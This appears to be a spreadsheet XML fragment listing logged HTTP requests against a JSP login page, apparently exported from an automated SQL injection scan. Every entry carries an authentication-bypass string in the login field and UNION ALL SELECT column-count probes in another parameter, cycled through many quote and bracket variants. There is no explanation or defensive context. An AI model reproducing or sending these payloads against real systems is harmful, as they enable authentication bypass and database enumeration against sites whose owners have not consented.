    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(((8563=8563&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(((7804=7804&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(((1278=1278&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((7812=7812&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((8926=8926&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((5799=5799&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((9396=9396&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((1842=1842&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((2760=2760&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(((4526=4526&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect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--and('wjpy'='wjpy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and('iqcw'='iqcw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and('eusg'='eusg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and('tcmm'='tcmm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('yeke'='yeke&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('gpfc'='gpfc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('hjxv'='hjxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('prsl'='prsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('kcrn'='kcrn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ckao'='ckao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(('jzxb'='jzxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(('kriq'='kriq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(('ppqn'='ppqn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('zvjw'='zvjw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('bdtr'='bdtr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('tqin'='tqin&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('zdns'='zdns&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('rryh'='rryh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('omaz'='omaz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('xfrt'='xfrt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((('dyuj'='dyuj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((('uqwc'='uqwc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((('wfwj'='wfwj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('kpyu'='kpyu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('bnqh'='bnqh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('cvns'='cvns&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('qzvs'='qzvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('nlgw'='nlgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('ovrl'='ovrl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('tgao'='tgao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null--and'vzzi'='vzzi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and'ljnl'='ljnl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and'oueo'='oueo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and'lahc'='lahc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'eobi'='eobi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'aaqq'='aaqq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'dftl'='dftl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'gxjf'='gxjf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'tuci'='tuci&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'megs'='megs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null--and('nxuj'like'nxuj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and('wqzq'like'wqzq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and('zydf'like'zydf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and('lfez'like'lfez&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('vygf'like'vygf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('obqm'like'obqm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('xeoo'like'xeoo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('neiv'like'neiv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('atsi'like'atsi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('qmvw'like'qmvw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(('boyl'like'boyl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(('tcxi'like'tcxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(('npaj'like'npaj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('toao'like'toao&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('jlyf'like'jlyf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('raxb'like'raxb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('gpmo'like'gpmo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('ueat'like'ueat&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('aado'like'aado&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(('bcit'like'bcit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((('llxq'like'llxq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((('miwj'like'miwj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((('tsul'like'tsul&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('hfsf'like'hfsf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('vwll'like'vwll&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('iaph'like'iaph&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('muhw'like'muhw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('chnj'like'chnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('urwc'like'urwc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((('akfp'like'akfp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null--and'qujz'like'qujz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and'xbvm'like'xbvm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and'gvsx'like'gvsx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and'rsqm'like'rsqm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'xmzf'like'xmzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'kekh'like'kekh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'xgmp'like'xgmp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'rywn'like'rywn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'qcsb'like'qcsb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and'yfvd'like'yfvd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null--and("iaqd"="iaqd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and("flij"="flij&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and("pslu"="pslu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and("iqig"="iqig&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("eopo"="eopo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("rmkl"="rmkl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("fppa"="fppa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("ndip"="ndip&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("ywgx"="ywgx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and("dsbd"="dsbd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and(("nzau"="nzau&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(("avqr"="avqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(("fvaf"="fvaf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("dgus"="dgus&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("pnxx"="pnxx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("wqou"="wqou&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("mybr"="mybr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("wfbx"="wfbx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("daow"="daow&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(("mcug"="mcug&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((("hjvs"="hjvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((("fhcr"="fhcr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((("voxd"="voxd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("lfda"="lfda&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("fnga"="fnga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("mhia"="mhia&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((("wrrj"="wrrj&amp;modo=entrar</t>
  </si>
  <si>
